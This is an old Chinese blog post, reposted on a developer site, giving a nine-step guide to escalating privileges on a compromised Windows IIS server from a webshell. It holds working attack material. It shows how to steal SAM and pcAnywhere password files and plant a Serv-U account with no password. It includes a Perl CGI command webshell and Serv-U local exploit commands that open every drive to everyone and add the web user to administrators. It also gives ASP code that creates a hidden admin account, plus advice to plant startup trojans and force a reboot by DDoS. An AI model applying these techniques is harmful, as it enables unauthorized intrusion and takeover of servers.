提升权限终极技巧

限时加码!20+主流AI编程工具免费用 购周边加赠Coding Plan Lite,Claude Code、Cursor等即刻畅享,学习进阶更高效! 阅读详情
作者:WekweN http://www.wrsky.com

本篇文章结合了许多高手提升权限的技巧和自己的一些想法

当我们取得一个webshell时候,下一部要做的就是提升权限

个人总结如下:
1: C:/Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/
看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密码,登陆
ps: 破解工具本站已提供。请自己Search一下

2.C:/WINNT/system32/config/
进这里下它的 SAM,破解用户的密码
用到破解sam密码的软件有 LCSAMinside

3.C:/Documents and Settings/All Users/「开始」菜单/程序/
看这里能跳转不,我们从这里可以获取好多有用的信息
可以看见好多快捷方式,我们一般选择Serv-U的,然后本地查看属性,知道路径后,看能否跳转
进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空
[USER=WekweN|1]
Password=
HomeDir=c:/
TimeOut=600
Maintenance=System
Access1=C:/|RWAMELCDP
Access1=d:/|RWAMELCDP
Access1=f:/|RWAMELCDP
SKEYValues=
这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限


4.c:/winnt/system32/inetsrv/data/
就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行

5.看能否跳转到如下目录
c:/php, 用phpspy
c:/prel,有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell
#!/usr/bin/perl
binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html/r/n/r/n", 27);
$_ = $ENV{QUERY_STRING};
s/%20/ /ig;
s/%2f////ig;
$execthis = $_;
syswrite(STDOUT, "<HTML><PRE>/r/n", 13);
open(STDERR, ">&STDOUT") || die "Can't redirect STDERR";
system($execthis);
syswrite(STDOUT, "/r/n</PRE></HTML>/r/n", 17);
close(STDERR);
close(STDOUT);
exit;
保存为cgi执行,
如果不行,可以试试 pl 扩展呢,把刚才的 cgi 文件改为 pl 文件,提交 http://anyhost//cmd.pl?dir
显示"拒绝访问",表示可以执行了!马上提交:先的上传个su.exe(ser-u提升权限的工具)到 prel的bin目录
http://anyhost//cmd.pl?c/perl/bin/su.exe
返回:
Serv-u >3.x Local Exploit by xiaolu

USAGE: serv-u.exe "command"

Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"
现在是 IUSR 权限,提交:
http://anyhost//cmd.pl?c/perl/bin/su.exe "cacls.exe c: /E /T /G everyone:F"
http://anyhost//cmd.pl?c/perl/bin/su.exe "cacls.exe d: /E /T /G everyone:F"
http://anyhost//cmd.pl?c/perl/bin/su.exe "cacls.exe e: /E /T /G everyone:F"
http://anyhost//cmd.pl?c/perl/bin/su.exe "cacls.exe f: /E /T /G everyone:F"
如果返回下面的信息,就表示成功了
Serv-u >3.x Local Exploit by xiaolu

<220 Serv-U FTP Server v5.2 for WinSock ready...

>USER LocalAdministrator

<331 User name okay, need password.

******************************************************

>PASS #l@$ak#.lk;0@P

<230 User logged in, proceed.

******************************************************

>SITE MAINTENANCE

******************************************************

[+] Creating New Domain...

<200-DomainID=2

<220 Domain settings saved

******************************************************

[+] Domain xl:2 created

[+] Creating Evil User

<200-User=xl

200 User settings saved

******************************************************

[+] Now Exploiting...

>USER xl

<331 User name okay, need password.

******************************************************

>PASS 111111

<230 User logged in, proceed.

******************************************************

[+] Now Executing: cacls.exe c: /E /T /G everyone:F

<220 Domain deleted
这样所有分区为everyone完全控制
现在我们把自己的用户提升为管理员:

http://anyhost//cmd.pl?c/perl/bin/su.exe " net localgroup administrators IUSR_anyhost /add"


6.可以成功运行"cscript C:/Inetpub/AdminScripts/adsutil.vbs get w3svc/inprocessisapiapps"来提升权限
用这个cscript C:/Inetpub/AdminScripts/adsutil.vbs get w3svc/inprocessisapiapps
查看有特权的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
再将asp.dll加入特权一族
asp.dll是放在c:/winnt/system32/inetsrv/asp.dll (不同的机子放的位置不一定一样)
我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:/WINNT/system32/idq.dll" "C:/WINNT/system32/inetsrv/httpext.dll" "C:/WINNT/system32/inetsrv/httpodbc.dll" "C:/WINNT/system32/inetsrv/ssinc.dll" "C:/WINNT/system32/msw3prt.dll""c:/winnt/system32/inetsrv/asp.dll"
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了

7.还可以用这段代码试提升,好象效果不明显
<%@codepage=936%><%Response.Expires=0
on error resume next
Session.TimeOut=50
Server.ScriptTimeout=3000
set lp=Server.createObject("WSCRIPT.NETWORK")
oz="WinNT://"&lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
Set od=ob.create("user","WekweN$")
od.SetPassword "WekweN" <-----密码
od.SetInfo
Set of=GetObject(oz&"/WekweN$,user")
oe.Add(of.ADsPath)
Response.write "WekweN$ 超级帐号建立成功!"%>


用这段代码检查是否提升成功
<%@codepage=936%>
<%Response.Expires=0
on error resume next '查找Administrators组帐号
Set tN=server.createObject("Wscript.Network")
Set objGroup=GetObject("WinNT://"&tN.ComputerName&"/Administrators,group")
For Each admin in objGroup.Members
Response.write admin.Name&"<br>"
Next
if err then
Response.write "不行啊:Wscript.Network"
end if
%>

8.C:/Program Files/Java Web Start/
这里如果可以,一般很小,可以尝试用jsp的webshell,听说权限很小,本人没有遇见过。

9.最后了,如果主机设置很变态,可以试下在c:/Documents and Settings/All Users/「开始」菜单/程序/启动"写入bat,vbs等木马。

等到主机重启或者你ddos逼它重启,来达到权限提升的目的。


总结起来说就是,找到有执行和写入的目录,管他什么目录,然后上传提升工具,最后执行,三个字"找" "上""执"

以上是本人的拙见,大家有什么好的方法多多分享
WekweN
04.12.12
提权技术之给任意进程提权(我们以OD,CE为例) 赋予进程某种特殊权限 也叫提升读写权限 那么为什么要提升读写的权限呢 如果我们想修改游戏内存数据 数字的话正常情况下我们无法进行跨进程内存读写 这时候就可以使用 提升自身辅助进程的权限 来达到能读写游戏内存的效果那提权的原理又是什么呢?游戏虽然做了自身的进程保护 不允许其他进程读写 但是我们电脑系统本身就是有系统自带的进程winlogon.exe 这进程为例,这个进程是可以随意读写游戏内存的 游戏的保护也会过滤掉系统进程对自身的读写, 阅读详情

相关推荐

易语言模块提升进程权限.rar

易语言模块提升进程权限.rar

用户提权su sudo

1.su命令进行提权 优点:比较方便可以直接切换root获得权限 缺点:有一定的风险,如果普通用户权限太大会出现一些安全问题 su - usename(可以进行用户切换) 那么同时普通用户如果知道root密码也可以通过su - root切换到root用户,然后获得root权限,但是这样有很大的风险,如果普通用户权限太高会存在安全问题。 vim /etc/pam.d/su /etc/pam.d是一个存放有很多模块的目录 ,这些目录中有一个su模块,可以限制普通用户对su的执行,凡是在wheel组.

weixin_46946629的博客 1964

windows运行vbs脚本没有权限

windows运行vbs脚本没有权限

Palin的博客 1万+

linux su提权命令,Linux命令 -- su sudo 用户提权

su #切换用户,普通用户切换到root用户,需要知道root密码优点:简单缺点:需要知道root密码su -:加 - 属于登录式shell,不加属于非登录式shellsudo #提权,普通用户需要使用root权限时进行提权,无需切换到root用户优点:安全,方便缺点:复杂sudo su - #使用root用户登录,不用输入root密码即可切换sudo -l:查...

weixin_28285943的博客 658

九点提升权限终极技巧

九点提升权限终极技巧   [ 日期: 2005-07-09 00:01 | 作者: d99 | 来自: http://blog.hackbase.com/cat | | ]   转自http://blog.hackbase.com/cat提升

古剑楠的专栏 1102

[转]Windows平台九点提升权限终极技巧

//文章不错,我看了后觉得对于系统管理员来讲能够更好的防范这种渗透攻击,提升系统安全性能转自http://blog.hackbase.com/cat提升权限终极技巧作者:黑狼个人总结如下:1: C:/Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/看能否跳转到这个目录,如果行那就最好了,直接下它的CIF

.NET博文收藏 358

Windows平台九点提升权限终极技巧

 个人总结如下:1: C:/Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密码,登陆ps: 破解工具本站已提供。请自己Search一下!2.C:/WINNT/system32/config/进这里下它的SAM,破解

风行天下 831

ente/auth 快速上手:免费开源两步验证认证器,从安装到自部署

ente/auth 是一款免费、开源的两步验证(2FA,即登录时除密码外再输一个动态码的机制)认证器,负责帮你存好并生成各个账号的时间验证码(TOTP,每 30 秒轮换一次的 6 位数字码)。它采用端到端加密——数据在你的设备上加密后才上传,云端也读不懂内容。它解决两个最实际的问题:换手机或丢手机后验证码不丢,以及几十个账号的码不用满世界翻找。更多背景可以看官方文档 [README.md](htt

gitblog_00798的博客 1007

iOS权限管理终极指南:PermissionsKit提升用户体验的10个技巧

权限管理是iOS应用开发中不可忽视的重要环节。正确的权限请求策略不仅能确保应用功能正常运行,更能显著提升用户体验。PermissionsKit作为一款强大的iOS权限管理库,提供了统一的API来请求权限和获取状态,支持`.authorized`、`.denied`和`.notDetermined`三种状态,让权限管理变得简单高效。🚀 ## 📱 为什么权限管理如此重要 在iOS生态系统中,用

gitblog_00977的博客 1025

ArduPilot 入门教程:零硬件起步,3 条命令跑通从 SITL 仿真到真机首飞

第一次让多旋翼在无人看管下自主返航时,多数人最担心的不是飞不起来,而是失联之后它会做什么:GPS 丢失后往哪飞、低电量在什么高度触发降高。这类问题的答案都写在飞控代码里,而 ArduPilot 正是把飞行逻辑全部开放的开源无人机飞控系统——GPLv3 许可,同一套代码库覆盖多旋翼、固定翼、地面车辆与水下机器人。 ## 认知地图:一套代码库覆盖五类载具 先用下表建立整体概念,再决定从哪里读起:

gitblog_00958的博客 1006

老Mac免费装新版macOS:一份三步走完的完整施工单

苹果对每代 Mac 的官方维护只有七年上下。支持期一过,旧机器连安全补丁都收不到,应用商店也开始拒绝装新版。OCLP(OpenCore Legacy Patcher)这个免费开源工具,能让 2008–2015 年的老 Mac 免费安装 Big Sur 到 Sequoia 的新版 macOS,不用花一分钱换机。下面按一张施工单来走:先给机器做体检、看前后对照,讲清原理,再给出施工准备、系统盘、装系统

gitblog_00921的博客 937

Laravel-Acl缓存策略终极指南:提升权限检查性能的10个实用技巧

Laravel-Acl是一个轻量级的基于角色的权限系统,专为Laravel 6+设计。在复杂的Web应用中,权限检查是频繁且关键的操作,而**laravel-acl缓存策略**正是优化这一过程的核心技术。通过合理的缓存配置,你可以显著提升应用的响应速度和性能表现。 ## 📊 Laravel-Acl缓存机制深度解析 ### 1. 默认缓存配置详解 Laravel-Acl的缓存系统在配置文件`

gitblog_00271的博客 652
上一篇: 添加超级用户的.asp代码[蓝屏的原创,凯文改进,Ms未公布的漏洞]
下一篇: 动网直接查看MD5值密码
freexploit
博客等级 码龄22年 315粉丝 778原创
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值